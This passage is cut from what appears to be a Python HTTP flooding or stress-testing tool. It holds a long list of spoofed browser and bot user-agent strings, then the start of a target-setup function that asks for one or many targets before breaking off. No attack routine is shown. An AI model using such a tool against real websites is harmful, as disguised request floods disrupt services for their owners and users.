"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941",
"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 ",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (PLAYSTATION 3; 1.10)",
"Mozilla/5.0 (PLAYSTATION 3; 2.00)",
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0",
"Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525",
"Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2",
"Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23",
"msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.0 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.1 ( http://search.msn.com/msnbot.htm)",
"msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)",
"NetSurf/1.2 (NetBSD; amd64)",
"Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0",
"Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1",
"nook browser/1.0",
"Offline Explorer/2.5",
"Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30",
"Opera/7.50 (Windows ME; U) [en]",
"Opera/7.50 (Windows XP; U)",
"Opera/7.51 (Windows NT 5.1; U) [en]",
"Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr)",
"Opera/9.0 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.20 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Windows NT 6.0; U; en)",
"Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)",
"Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)",
"Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0",
"Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1",
"Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1",
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00",
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00",
"Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10",
"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
"P3P Validator",
"Peach/1.01 (Ubuntu 8.04 LTS; U; en)",
"POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1",
"POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1",
"portalmmm/2.0 N410i(c20;TB) ",
"Python-urllib/2.5",
"SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3",
"SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"SearchExpress",
"SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr)",
"SEC-SGHX210/1.0 UP.Link/6.3.1.13.0",
"SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT100/R101",
"SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0",
"SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT68/R201A",
"SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US]",
"SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0",
"SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SuperBot/4.4.0.60 (Windows XP)",
"Uzbl (Webkit 1.3) (Linux i686 [i686])",
"Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1",
"W3C_Validator/1.305.2.12 libwww-perl/5.64",
"W3C_Validator/1.654",
"w3m/0.5.1",
"WDG_Validator/1.6.2",
"WebCopier v4.6",
"Web Downloader/6.9",
"WebZIP/3.5 (http://www.spidersoft.com)",
"Wget/1.9.1",
"Wget/1.9 cvs-stable (Red Hat modified)",
"wii libnup/1.0",
]
def starturl(): # in questa funzione setto l'url per renderlo usabile per il futuro settaggio delle richieste HTTP.
global url
global url2
global urlport
global choice1
global ips
choice1 = input("\nDo you want one target [0] or more[1] > ")
if choice1 == "1":
